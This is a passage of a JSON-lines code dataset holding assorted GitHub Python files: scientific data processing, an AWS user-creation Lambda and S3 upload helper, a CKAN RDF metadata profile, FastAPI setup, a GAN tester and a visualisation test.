rospy.spin()\n","repo_name":"AbLECPS/alc","sub_path":"bluerov2_standalone/catkin_ws/src/vandy_bluerov/nodes/sonars/forward_imaging_sonar.py","file_name":"forward_imaging_sonar.py","file_ext":"py","file_size_in_byte":12377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"5426237042","text":"import os\nimport numpy\nfrom scipy import 
stats\nimport matplotlib.pyplot as plt\n\nws = os.getcwd()\n\nMCD12Q1_006_1KM = os.path.join(ws, 'MCD12Q1.006.LC.CEReS_H8AHI.01km.MEAN.NA.ann.bsq.byt')\nMCD12Q1_006_10KM_npy = os.path.join(ws, 'MCD12Q1_006_10km.npy')\n\nROI_DISTANCE = 0.1\n\nif __name__ == \"__main__\":\n roi_lats = numpy.arange(60. - ROI_DISTANCE / 2, -60, -ROI_DISTANCE)\n roi_lons = numpy.arange(85. + ROI_DISTANCE / 2, 205, ROI_DISTANCE)\n\n modis_lc_10km = numpy.zeros((len(roi_lats), len(roi_lons)))\n size = int(1/ROI_DISTANCE)\n\n with open(MCD12Q1_006_1KM, 'rb') as fp:\n landcover = numpy.frombuffer(fp.read(), dtype='uint8').reshape(12000, 12000)\n lat_roi_idx = 0\n for lat_idx in range(len(roi_lats)):\n print(lat_idx, '/', len(roi_lats))\n lon_roi_idx = 0\n for lon_idx in range(len(roi_lons)):\n lc_2d = landcover[lat_roi_idx*size:(lat_roi_idx+1)*size, lon_roi_idx*size:(lon_roi_idx+1)*size]\n # print(lat_roi_idx*size, (lat_roi_idx+1)*size, lon_roi_idx*size, (lon_roi_idx+1)*size)\n # print(lc_2d)\n lc_1d = lc_2d.flatten()\n lc_mode = stats.mode(lc_1d)[0]\n modis_lc_10km[lat_idx][lon_idx] = lc_mode\n lon_roi_idx += 1\n lat_roi_idx += 1\n numpy.save(MCD12Q1_006_10KM_npy, modis_lc_10km)\n plt.imshow(modis_lc_10km)\n plt.show()\n","repo_name":"Bosh0113/MISR_AHI","sub_path":"Data_Screening/statistics/preprocess/0_MCD12Q1_6_to10KM.py","file_name":"0_MCD12Q1_6_to10KM.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38621232428","text":"import boto3\nimport json\nfrom uuid import uuid4\nimport time\nfrom boto3.dynamodb.conditions import Key\n\n\ndef create_user(event, context):\n dynamodb = boto3.resource('dynamodb')\n table = dynamodb.Table('userTable')\n \n request_body = json.loads(event['body'])\n \n username = request_body['userName']\n response = table.query(\n KeyConditionExpression=Key('userName').eq(username))\n print(response)\n \n if len(response[\"Items\"]) > 0:\n return {\n 'statusCode': 409,\n 'body': json.dumps({'error': 'Username already exists'})\n }\n \n user_id = str(uuid4())\n \n try:\n user = {\n 'userId': user_id,\n 'activateUser': request_body['activateUser'],\n 'createdAt': str(int(time.time() * 1000)),\n 'currency': request_body['currency'],\n 'lastName': request_body['lastName'],\n 'email': request_body['email'],\n 'firstName': request_body['firstName'],\n 'phone': request_body['phone'],\n 'role': request_body['role'],\n 'userName': username\n }\n table.put_item(Item=user)\n except Exception as e:\n return {\n 'statusCode': 400,\n 'body': json.dumps({'error': str(e)})\n }\n \n response_payload = {\n 'userId': user_id,\n 'activateUser': user['activateUser'],\n 'createdAt': user['createdAt'],\n 'currency': user['currency'],\n 'lastName': user['lastName'],\n 'email': user['email'],\n 'firstName': user['firstName'],\n 'phone': user['phone'],\n 'role': user['role'],\n 'id': user['userId']\n }\n \n response = {\n 'statusCode': 201,\n 'body': json.dumps(response_payload)\n }\n \n return response\n","repo_name":"Adeakim/tinkoko_marketplace","sub_path":"create_user.py","file_name":"create_user.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73414313129","text":"import logging\n\nfrom ckan.lib.helpers import url_for\n\nfrom ckanext.dcat.profiles import RDFProfile\nfrom ckanext.kata.helpers import convert_language_code, get_download_url, \\\n get_if_url, get_rightscategory, is_url, json_to_list, 
split_disciplines, \\\n resolve_org_name\nfrom ckanext.kata.utils import get_primary_pid, get_pids_by_type\nfrom ckanext.kata.utils import remove_trailing_spaces, remove_all_spaces\n\nfrom rdflib import BNode, Literal, URIRef\nfrom rdflib.namespace import Namespace, RDF\n\nlog = logging.getLogger(__name__)\n\nDCT = Namespace(\"http://purl.org/dc/terms/\")\nDCAT = Namespace(\"http://www.w3.org/ns/dcat#\")\nADMS = Namespace(\"http://www.w3.org/ns/adms#\")\nORG = Namespace(\"http://www.w3.org/ns/org#\")\nFRAPO = Namespace(\"http://purl.org/cerif/frapo/\")\nRDFS = Namespace(\"http://www.w3.org/2000/01/rdf-schema#\")\nFOAF = Namespace(\"http://xmlns.com/foaf/0.1/\")\nSPDX = Namespace('http://spdx.org/rdf/terms#')\nSCHEMA = Namespace('http://schema.org/')\n\nnamespaces = {\n 'dct': DCT,\n 'dcat': DCAT,\n 'adms': ADMS,\n 'org': ORG,\n 'frapo': FRAPO,\n 'rdfs': RDFS,\n 'foaf': FOAF,\n 'spdx': SPDX,\n 'schema': SCHEMA\n}\n\n\nclass KataDcatProfile(RDFProfile):\n '''\n A custom profile to add KATA fields to the ckanext-dcat RDF serializer.\n Modified from EuropeanDCATAPProfile\n '''\n\n def _add_translated_triple_from_dict(self, _dict, subject, predicate, key,\n fallback=None):\n \"\"\"\n Creates an RDF triple from a Kata language string\n {\"fin\": \"Otsikko\", \"eng\": \"Title\"} ->\n Otsikko\n Title\n \"\"\"\n\n value = self._get_dict_value(_dict, key)\n if not value and fallback:\n value = self._get_dict_value(_dict, fallback)\n for item in json_to_list(value):\n lang = convert_language_code(\n item.get('lang'), 'alpha2', throw_exceptions=False)\n params = (subject, predicate, Literal(\n item.get('value'), lang=lang))\n self.g.add(params)\n\n def graph_from_dataset(self, dataset_dict, dataset_ref):\n primary_pid = get_primary_pid(dataset_dict)\n if not primary_pid:\n return\n\n g = self.g\n\n for prefix, namespace in namespaces.iteritems():\n g.bind(prefix, namespace)\n\n g.add((dataset_ref, RDF.type, DCAT.Dataset))\n\n # Etsin: homepage\n uri = url_for(controller='package', action='read',\n id=dataset_dict.get('name'), qualified=True)\n g.add((dataset_ref, FOAF.homepage, URIRef(remove_trailing_spaces(uri))))\n\n # Etsin: primary identifier\n g.add((dataset_ref, ADMS.identifier, URIRef(remove_trailing_spaces(primary_pid))))\n\n # Etsin: Relation identifiers\n relation_pids = get_pids_by_type('relation', dataset_dict)\n for rpid in relation_pids:\n if rpid.get('relation') == 'isNewVersionOf' or rpid.get('relation') == 'isPreviousVersionOf':\n g.add((dataset_ref, DCT.isVersionOf, URIRef(remove_trailing_spaces(rpid.get('id')))))\n elif rpid.get('relation') == 'hasPart':\n g.add((dataset_ref, DCT.hasPart, URIRef(remove_trailing_spaces(rpid.get('id')))))\n elif rpid.get('relation') == 'isPartOf':\n g.add((dataset_ref, DCT.isPartOf, URIRef(remove_trailing_spaces(rpid.get('id')))))\n else:\n g.add((dataset_ref, DCT.identifier, URIRef(remove_trailing_spaces(rpid.get('id')))))\n\n # Etsin: Title and Description, including translations\n items = [\n (DCT.title, 'langtitle', 'title'),\n (DCT.description, 'notes'),\n ]\n\n for item in items:\n self._add_translated_triple_from_dict(\n dataset_dict, dataset_ref, *item)\n\n # Etsin: Agents\n for agent in dataset_dict.get('agent', []):\n agent_role = agent.get('role')\n agent_id = agent.get('id')\n\n # Rights Holders\n if agent_role in ['owner', 'distributor']:\n name = agent.get('name', None)\n\n if agent_role == 'owner':\n if not get_if_url(agent.get('name')):\n name = agent.get('name', agent.get('organisation', ''))\n nodetype = DCT.rightsHolder\n\n if 
agent_role == 'distributor':\n nodetype = DCT.publisher\n\n agent_node_ref = BNode()\n g.add((agent_node_ref, RDF.type, FOAF.Agent))\n g.add((dataset_ref, nodetype, agent_node_ref))\n g.add((agent_node_ref, FOAF.name, Literal(name)))\n if agent_id:\n g.add((agent_node_ref, DCT.identifier, Literal(agent_id)))\n\n # Authors\n if agent_role in ['author', 'contributor']:\n if agent_role == 'author':\n nodetype = DCT.creator\n\n if agent_role == 'contributor':\n nodetype = DCT.contributor\n\n organization_ref = BNode()\n agent_ref = BNode()\n memberof_ref = BNode()\n creator_ref = BNode()\n\n g.add((organization_ref, FOAF.name, Literal(\n agent.get('organisation', None))))\n g.add((memberof_ref, FOAF.organization, organization_ref))\n g.add((agent_ref, ORG.memberOf, memberof_ref))\n g.add((agent_ref, FOAF.name, Literal(agent.get('name', None))))\n g.add((creator_ref, FOAF.Agent, agent_ref))\n g.add((dataset_ref, nodetype, creator_ref))\n\n if agent_id:\n g.add((agent_ref, DCT.identifier, Literal(agent_id)))\n\n\n # Funders\n if agent.get('role') == 'funder':\n organization_ref = BNode()\n memberof_ref = BNode()\n project_ref = BNode()\n isoutputof_ref = BNode()\n\n agent_url = agent.get('URL')\n if agent_url:\n g.add((project_ref, FOAF.homepage, Literal(agent_url)))\n\n funding_id = agent.get('fundingid')\n if funding_id:\n g.add((project_ref, RDFS.comment, Literal(funding_id)))\n\n g.add((organization_ref, FOAF.name, Literal(\n agent.get('organisation', None))))\n g.add((memberof_ref, FOAF.organization, organization_ref))\n g.add((project_ref, ORG.memberOf, memberof_ref))\n\n agent_name = agent.get('name', None)\n g.add((project_ref, FOAF.name, Literal(agent_name)))\n\n if agent_id:\n g.add((project_ref, DCT.identifier, Literal(agent_id)))\n\n g.add((isoutputof_ref, FOAF.Project, project_ref))\n g.add((dataset_ref, FRAPO.isOutputOf, isoutputof_ref))\n\n # Etsin: Publishers\n for contact in dataset_dict.get('contact'):\n agent_node_ref = BNode()\n agent_id = contact.get('id')\n\n g.add((agent_node_ref, RDF.type, FOAF.Agent))\n g.add((dataset_ref, DCT.publisher, agent_node_ref))\n\n contact_name = contact.get('name', None)\n g.add((agent_node_ref, FOAF.name, Literal(contact_name)))\n if agent_id:\n g.add((agent_node_ref, DCT.identifier, Literal(agent_id)))\n\n contact_email = contact.get('email')\n if contact_email and contact_email != 'hidden':\n g.add((agent_node_ref, FOAF.mbox,\n URIRef(\"mailto:\" + remove_trailing_spaces(contact_email))))\n\n contact_url = contact.get('URL')\n if contact_url:\n g.add((agent_node_ref, FOAF.homepage, URIRef(remove_trailing_spaces(contact_url))))\n\n contact_phone = remove_all_spaces(contact.get('phone'))\n if contact_phone:\n g.add((agent_node_ref, FOAF.phone,\n URIRef(\"tel:\" + remove_trailing_spaces(contact_phone))))\n\n # Etsin: Organization\n organization_name = resolve_org_name(dataset_dict.get('owner_org'))\n publisher_ref = BNode()\n g.add((dataset_ref, DCT.publisher, publisher_ref))\n g.add((publisher_ref, FOAF.organization, Literal(organization_name)))\n\n # Etsin: Tags - can be URLs or user inputted keywords\n # TODO: resolve URLs from Finto. Currently get_label_for_uri() breaks\n # RDFlib.\n for tag in dataset_dict.get('tags', []):\n display_name = tag.get('display_name')\n g.add((dataset_ref, DCAT.keyword, Literal(display_name)))\n tag_name = tag.get('name')\n if is_url(tag_name):\n g.add((dataset_ref, DCAT.theme, URIRef(remove_trailing_spaces(tag_name))))\n\n # Etsin: Dates\n # Peter: Issued-field is new. 
This used to be inside CatalogRecord.\n items = [\n ('issued', DCT.issued, ['metadata_created'], Literal),\n ('modified', DCT.modified, ['metadata_modified'], Literal),\n ]\n self._add_date_triples_from_dict(dataset_dict, dataset_ref, items)\n\n # Etsin: Events\n for event in dataset_dict.get('event', []):\n event_ref = BNode()\n g.add((dataset_ref, DCT.event, event_ref))\n g.add((event_ref, DCT.type, Literal(event.get('type'))))\n g.add((event_ref, DCT.creator, Literal(event.get('who'))))\n g.add((event_ref, DCT.date, Literal(str(event.get('when')))))\n g.add((event_ref, DCT.description, Literal(event.get('descr'))))\n\n # Etsin: Citation\n citation = dataset_dict.get('citation')\n if citation:\n g.add((dataset_ref, DCT.bibliographicCitation, Literal(citation))) \n\n\n # Etsin: Distribution\n availability_list = ['access_application_rems',\n 'access_application_other',\n 'access_request']\n\n checksum_ref = BNode()\n checksum_parent_ref = BNode()\n distribution_ref = BNode()\n dist_parent_ref = BNode()\n\n if dataset_dict.get('availability') == 'direct_download':\n access_url = get_download_url(dataset_dict)\n g.add((distribution_ref, DCAT.downloadURL, Literal(access_url)))\n\n checksum = dataset_dict.get('checksum')\n algorithm = dataset_dict.get('algorithm')\n if checksum and algorithm:\n g.add((checksum_ref, SPDX.checksumValue, Literal(checksum)))\n g.add((checksum_ref, SPDX.algorithm, Literal(algorithm)))\n g.add((checksum_parent_ref, SPDX.Checksum, checksum_ref))\n g.add((distribution_ref, SPDX.checksum, checksum_parent_ref))\n\n if dataset_dict.get('availability') in availability_list:\n access_url = get_download_url(dataset_dict)\n g.add((distribution_ref, DCAT.accessURL, Literal(access_url)))\n\n mimetype = dataset_dict.get('mimetype')\n if mimetype:\n g.add((distribution_ref, DCAT.mediaType, Literal(mimetype)))\n\n dist_format = dataset_dict.get('format')\n if dist_format:\n g.add((distribution_ref, DCT['format'], Literal(dist_format)))\n\n g.add((dist_parent_ref, DCAT.Distribution, distribution_ref))\n g.add((dataset_ref, DCAT.distribution, dist_parent_ref))\n\n # Etsin: Disciplines\n disciplines = dataset_dict.get('discipline', '')\n for discipline in split_disciplines(disciplines):\n if is_url(discipline):\n disc = URIRef(remove_trailing_spaces(discipline))\n\n else:\n disc = Literal(discipline)\n g.add((dataset_ref, DCT.subject, disc))\n\n # Etsin: Rights Declaration\n # Peter: There's no way to add an xmlns attribute under\n # the parent in rdflib\n category, declarations = get_rightscategory(dataset_dict)\n declaration_strings = ''\n for declaration in declarations:\n declaration_strings += u'{}\\n'\\\n .format(declaration)\n xml_string = u'\\n{}'\\\n .format(category, declaration_strings)\n\n license_url = dataset_dict.get('license_URL')\n\n rights_ref = BNode()\n g.add((dataset_ref, DCT.rights, rights_ref))\n g.add((rights_ref, DCT.RightsStatement, Literal(\n xml_string, datatype=RDF.XMLLiteral)))\n g.add((rights_ref, DCT.RightsStatement, Literal(license_url)))\n\n\n # Etsin: Spatial\n coverage = dataset_dict.get('geographic_coverage')\n if coverage:\n spatial_ref = BNode()\n location_ref = BNode()\n g.add((location_ref, RDFS.label, Literal(coverage)))\n g.add((spatial_ref, DCT.Location, location_ref))\n g.add((dataset_ref, DCT.spatial_ref, spatial_ref))\n\n # Etsin: Temporal\n # Peter: hasBeginning and hasEnd left out\n temporal_coverage_begin = dataset_dict.get('temporal_coverage_begin')\n temporal_coverage_end = dataset_dict.get('temporal_coverage_end')\n if 
temporal_coverage_begin or temporal_coverage_end:\n temporal_extent = BNode()\n\n g.add((temporal_extent, RDF.type, DCT.PeriodOfTime))\n if temporal_coverage_begin:\n self._add_date_triple(\n temporal_extent, SCHEMA.startDate, temporal_coverage_begin)\n\n if temporal_coverage_end:\n self._add_date_triple(\n temporal_extent, SCHEMA.endDate, temporal_coverage_end)\n\n g.add((dataset_ref, DCT.temporal, temporal_extent))\n\n # Etsin: language field needs to be stripped from spaces\n langs = self._get_dict_value(dataset_dict, 'language', '').split(', ')\n for lang in langs:\n params = (dataset_ref, DCAT.language, Literal(lang))\n self.g.add(params)\n","repo_name":"kata-csc/ckanext-kata","sub_path":"ckanext/kata/kata_dcat_profile.py","file_name":"kata_dcat_profile.py","file_ext":"py","file_size_in_byte":14156,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"15385157729","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n' StorageHelp for AWS version '\n\nimport boto3\nimport logging\nimport os\nimport configparser\nif __name__ == '__main__':\n from StorageHelpBase import StorageHelpBase\nelse:\n from .StorageHelpBase import StorageHelpBase\n\n\n__author__ = 'Ed Hsu'\n\n\nlogging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s %(levelname)s [%(filename)s-%(funcName)s()]'\n ' %(message)s',\n datefmt='%m-%d %H:%M')\n\n\nclass StorageHelpAws(StorageHelpBase):\n def __init__(self, credential):\n super().__init__(credential)\n\n def get_bucket_acl(self, bucket):\n client = self.__get_client()\n acl = client.get_bucket_acl(Bucket=bucket)\n logging.info('''bucket acl:{}'''.format(acl))\n\n def upload(self, bucket, src_file, target_file):\n logging.info('''\n bucket:{}\n src_file:{}\n target_file:{}'''.format(bucket, src_file, target_file))\n res = self.__get_resource()\n res.Bucket(bucket).upload_file(src_file, target_file, ExtraArgs={'ACL': 'public-read'})\n\n def __get_client(self):\n client = boto3.client(\n 's3',\n aws_access_key_id=self.credential['aws_access_key_id'],\n aws_secret_access_key=self.credential['aws_secret_access_key']\n )\n return client\n\n def __get_resource(self):\n res = boto3.resource(\n 's3',\n aws_access_key_id=self.credential['aws_access_key_id'],\n aws_secret_access_key=self.credential['aws_secret_access_key']\n )\n return res\n\nif __name__ == '__main__':\n credentialFile = os.path.join(os.path.dirname(__file__), 'credential.cfg')\n config = configparser.ConfigParser()\n config.read(credentialFile)\n # print(config.sections())\n dict_credential = {\n 'aws_access_key_id': config['AWS_INFO']['AWS_ACCESS_KEY_ID'],\n 'aws_secret_access_key': config['AWS_INFO']['AWS_SECRET_ACCESS_KEY']}\n myStorageHelp = StorageHelpAws(dict_credential)\n bucket_name = config['AWS_INFO']['AWS_BUCKET_HOME_PORTAL']\n # myStorageHelp.get_bucket_acl(bucket_name)\n\n resDir = os.path.join(os.path.dirname(__file__), 'res')\n srcFile = os.path.join(resDir, '1.jpg')\n targetFile = 'test/{}'.format(os.path.basename(srcFile))\n myStorageHelp.upload(bucket_name, srcFile, targetFile)\n","repo_name":"sauleddy/HomePortal","sub_path":"resource_help/ResHelp/StorageHelp/StorageHelpAws.py","file_name":"StorageHelpAws.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2596806332","text":"from fastapi import FastAPI, APIRouter\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom app.api.api_v1.api import api_router\nfrom 
app.core.config import settings\n\n\ndef include_router(app):\n    app.include_router(api_router)  # list of API routes\n\n\ndef start_application():\n    app = FastAPI(title=settings.PROJECT_TITLE, version=settings.PROJECT_VERSION)\n    # app = FastAPI()\n    include_router(app)\n    if settings.BACKEND_CORS_ORIGINS:\n        app.add_middleware(\n            CORSMiddleware,\n            allow_origins=[str(origin) for origin in settings.BACKEND_CORS_ORIGINS],\n            allow_credentials=True,\n            allow_methods=[\"*\"],\n            allow_headers=[\"*\"],\n        )\n    return app\n\n\napp = start_application()\n","repo_name":"wai81/grkapp_pay_terminal","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"7508100633","text":"# @package cwfs\n# @file validation.py\n# @brief validation script for cwfs\n##\n# @authors: Bo Xin & Chuck Claver\n# @ Large Synoptic Survey Telescope\n\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom cwfsInstru import cwfsInstru\nfrom cwfsAlgo import cwfsAlgo\nfrom cwfsImage import cwfsImage\n\nimgDir = ['../testImages/F1.23_1mm_v61',\n          '../testImages/LSST_C_SN26', '../testImages/LSST_C_SN26',\n          '../testImages/LSST_NE_SN25', '../testImages/LSST_NE_SN25']\nintra = ['z7_0.25_intra.txt',\n         'z7_0.25_intra.txt', 'z7_0.25_intra.txt',\n         'z11_0.25_intra.txt', 'z11_0.25_intra.txt']\nextra = ['z7_0.25_extra.txt',\n         'z7_0.25_extra.txt', 'z7_0.25_extra.txt',\n         'z11_0.25_extra.txt', 'z11_0.25_extra.txt']\nfldxy = np.array([[0, 0], [0, 0], [0, 0], [1.185, 1.185], [1.185, 1.185]])\nmyalgo = ['fft', 'fft', 'exp', 'fft', 'exp']\nmymodel = ['paraxial', 'onAxis', 'onAxis', 'offAxis', 'offAxis']\nmyinst = 'lsst'\n\nvalidationDir = 'validation'\nmatlabZFile = ['F1.23_1mm_v61_z7_0.25_fft.txt',\n               'LSST_C_SN26_z7_0.25_fft.txt',\n               'LSST_C_SN26_z7_0.25_exp.txt',\n               'LSST_NE_SN25_z11_0.25_fft.txt',\n               'LSST_NE_SN25_z11_0.25_exp.txt']\n\nznmax = 22\nnTest = len(intra)\nzer = np.zeros((znmax - 3, nTest))\nmatZ = np.zeros((znmax - 3, nTest))\nx = range(4, znmax + 1)\n\nfig = plt.figure(figsize=(10, 10))\n\nfor j in range(0, nTest):\n    intraFile = os.path.join(imgDir[j], intra[j])\n    extraFile = os.path.join(imgDir[j], extra[j])\n    I1 = cwfsImage(intraFile, fldxy[j, :], 'intra')\n    I2 = cwfsImage(extraFile, fldxy[j, :], 'extra')\n\n    inst = cwfsInstru(myinst, I1.sizeinPix)\n    algo = cwfsAlgo(myalgo[j], inst, 1)\n    algo.runIt(inst, I1, I2, mymodel[j])\n    zer[:, j] = algo.zer4UpNm\n\n    matZ[:, j] = np.loadtxt(os.path.join(validationDir, matlabZFile[j]))\n\n    ax = plt.subplot(nTest, 1, j + 1)\n    plt.plot(x, matZ[:, j], label='Matlab',\n             marker='o', color='r', markersize=10)\n    plt.plot(x, zer[:, j], label='Python',\n             marker='.', color='b', markersize=10)\n    plt.legend(loc=\"upper right\", shadow=True,\n               title=matlabZFile[j], fancybox=True)\n    ax.get_legend().get_title().set_color(\"red\")\n\nplt.show()\n","repo_name":"WIYN-ODI/cwfs","sub_path":"validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"}
{"seq_id":"42418498406","text":"import numpy as np\r\nfrom mpmath import mp\r\n\r\nmp.dps = 1000\r\n\r\n\r\ndef f(z_interval, etajTy, mu, tn_sigma):\r\n    numerator = 0\r\n    denominator = 0\r\n\r\n    for each_interval in z_interval:\r\n        al = each_interval[0]\r\n        ar = each_interval[1]\r\n\r\n        cdf_ar = mp.ncdf((ar - mu) / tn_sigma)\r\n        cdf_al = mp.ncdf((al - mu) / tn_sigma)\r\n\r\n        denominator = denominator + 
cdf_ar - cdf_al\r\n\r\n if etajTy >= ar:\r\n numerator = numerator + cdf_ar - cdf_al\r\n elif (etajTy >= al) and (etajTy < ar):\r\n numerator = numerator + mp.ncdf((etajTy - mu) / tn_sigma) - cdf_al\r\n\r\n if denominator != 0:\r\n return float(numerator / denominator)\r\n else:\r\n return np.Inf\r\n\r\n\r\ndef find_root(z_interval, etajTy, tn_sigma, y, lb, ub):\r\n \"\"\"\r\n searches for solution to f(x) = y in (lb, ub), where\r\n f is a monotone decreasing function\r\n \"\"\"\r\n\r\n a, b = lb, ub\r\n fa, fb = f(z_interval, etajTy, a, tn_sigma), f(z_interval, etajTy, b, tn_sigma)\r\n\r\n if (fa > y) and (fb > y):\r\n while fb > y:\r\n b = b + ((b - a)/2)\r\n fb = f(z_interval, etajTy, b, tn_sigma)\r\n if fb == np.Inf:\r\n fb = 0\r\n\r\n elif (fa < y) and (fb < y):\r\n while fa < y:\r\n a = a - ((b - a)/2)\r\n fa = f(z_interval, etajTy, a, tn_sigma)\r\n if fa == np.Inf:\r\n fa = 1\r\n\r\n c = None\r\n\r\n while np.abs(b - a) > 1e-3:\r\n c = (a + b) / 2\r\n fc = f(z_interval, etajTy, c, tn_sigma)\r\n\r\n if np.around(fc, 4) == y:\r\n break\r\n\r\n if fc > y:\r\n a = c\r\n else:\r\n b = c\r\n\r\n return c\r\n\r\n\r\ndef equal_tailed_interval(z_interval, etajTy, alpha, tn_sigma):\r\n lb = -20\r\n ub = 20\r\n\r\n L = find_root(z_interval, etajTy, tn_sigma, 1.0 - 0.5 * alpha, lb, ub)\r\n U = find_root(z_interval, etajTy, tn_sigma, 0.5 * alpha, lb, ub)\r\n\r\n return np.array([L, U])\r\n\r\n\r\ndef compute_ci_with_constructed_interval(z_interval, etaj, etajTy, cov, alpha):\r\n tn_sigma = np.sqrt(np.dot(np.dot(etaj.T, cov), etaj))[0][0]\r\n\r\n ci = equal_tailed_interval(z_interval, etajTy, alpha, tn_sigma)\r\n\r\n return ci","repo_name":"vonguyenleduy/selective_inference_wasserstein_distance","sub_path":"ci.py","file_name":"ci.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27239565463","text":"from collections import defaultdict\nimport pandas as pd\nimport numpy as np\n\nCOLORS = ['steelblue', 'peru', 'red', 'limegreen', 'yellow', 'blue', 'darkgreen', 'orange', 'magenta']\n\n# Default use for gurobi\ndef viz_schedule(avail, b, n):\n n_filter = n.astype(bool)\n b_filter = b.astype(bool)\n a_filter = ~avail.astype(bool)\n\n def color_col(df):\n c_dict = defaultdict(lambda:'brown', zip(avail.columns, COLORS))\n df2 = df.copy(deep=True)\n df2[a_filter] = 'background-color: gray'\n for i, (colname, series) in enumerate(df2.items()):\n color = f\"background-color: {c_dict[colname]}\"\n series[(n_filter+b_filter)[:,i]] = color\n return df2\n\n schedule = pd.DataFrame(np.zeros(avail.shape), columns=avail.columns)\n schedule.iloc[:,:] = \"\"\n schedule[n_filter] = \"N\"\n schedule[b_filter] = \"B\"\n schedule[a_filter] = \"-\"\n return schedule.style.apply(color_col, axis=None)","repo_name":"janwodnicki/vet-scheduler","sub_path":"vizlib.py","file_name":"vizlib.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43458239834","text":"import torch\nfrom torch.autograd import Variable\n\nimport matplotlib.pyplot as plt\nimport itertools\nimport os\n\nfrom model.cgan import Generator\nfrom config import get_config\n\n# Device configuration\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nclass Tester(object):\n # initializer\n def __init__(self, config, weight_path, out_path):\n self.config = config\n\n self.nz = config.nz\n self.ngf = config.ngf\n self.ndf = 
config.ndf\n\n self.image_size = config.image_size\n self.ncls = config.n_classes\n\n self.g_path = weight_path + \"generator.pth\"\n\n self.out_path = out_path\n\n self.load_net()\n\n # load trained network\n def load_net(self):\n self.g = Generator(self.nz, self.ngf, self.ncls, self.image_size)\n self.g.load_state_dict(torch.load(self.g_path, map_location=lambda storage, loc: storage))\n self.g = self.g.to(device)\n self.g.eval() # fix parameters\n\n def denorm(self, x):\n out = (x + 1) / 2\n return out.clamp(0, 1)\n\n # generate test result images\n def test(self, nsamples):\n # fixed noise & label\n temp_z = torch.randn(nsamples, self.nz)\n fixed_z = temp_z\n fixed_y = torch.zeros(nsamples, 1)\n\n for i in range(self.ncls-1):\n fixed_z = torch.cat([fixed_z, temp_z], 0)\n temp_y = torch.ones(nsamples, 1) + i\n fixed_y = torch.cat([fixed_y, temp_y], 0)\n\n fixed_y_label = torch.zeros(nsamples*self.ncls, self.ncls)\n fixed_y_label.scatter_(1, fixed_y.type(torch.LongTensor), 1)\n\n # set fixed variable\n fixed_z = fixed_z.to(device)\n fixed_y_label = fixed_y_label.to(device)\n\n # generate result images\n result_imgs = self.g(fixed_z, fixed_y_label)\n result_imgs = result_imgs.view(-1, 1, self.image_size, self.image_size)\n result_imgs = self.denorm(result_imgs)\n\n # process image and save\n fig, ax = plt.subplots(self.ncls, nsamples, figsize=(5, 5))\n for i, j in itertools.product(range(self.ncls), range(nsamples)):\n ax[i, j].get_xaxis().set_visible(False)\n ax[i, j].get_yaxis().set_visible(False)\n\n for k in range(nsamples * self.ncls):\n i = k // nsamples\n j = k % nsamples\n ax[i, j].cla()\n ax[i, j].imshow(result_imgs[k, 0].cpu().data.numpy(), cmap='gray')\n\n label = 'Result image'\n fig.text(0.5, 0.04, label, ha='center')\n plt.savefig(self.out_path)\n\nif __name__ == \"__main__\":\n config = get_config()\n\n weight_path = \"samples\\weights\\\\\"\n\n os.makedirs('test', exist_ok=True)\n\n tester = Tester(config, weight_path, 'test\\out.png')\n tester.test(nsamples=15)","repo_name":"songyoungin/PG3_study","sub_path":"GAN/cGAN/MNIST/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10164602097","text":"import logging\n\nimport pytest\nfrom asapdiscovery.data.logging import FileLogger\nfrom asapdiscovery.data.testing.test_resources import fetch_test_file\nfrom asapdiscovery.dataviz.gif_viz import GIFVisualizer\n\n\n@pytest.fixture(scope=\"session\")\ndef top():\n top = fetch_test_file(\"example_traj_top.pdb\")\n return top\n\n\n@pytest.fixture(scope=\"session\")\ndef traj():\n traj = fetch_test_file(\"example_traj.xtc\")\n return traj\n\n\n@pytest.mark.parametrize(\n \"logger\",\n [\n None,\n FileLogger(\n \"gif_to_viz\", path=\"./\", stdout=True, level=logging.DEBUG\n ).getLogger(),\n ],\n)\ndef test_gif_viz(traj, top, logger, tmp_path):\n gif_visualiser = GIFVisualizer(\n [traj],\n [top],\n [tmp_path / \"gif_viz.gif\"],\n \"SARS-CoV-2-Mpro\", # just do a fast test with one target\n frames_per_ns=200,\n smooth=5,\n start=0,\n logger=logger,\n pse=False,\n pse_share=False,\n )\n gif_visualiser.write_traj_visualizations()\n","repo_name":"choderalab/asapdiscovery","sub_path":"asapdiscovery-dataviz/asapdiscovery/dataviz/tests/test_gif_viz.py","file_name":"test_gif_viz.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"14767135676","text":"import 
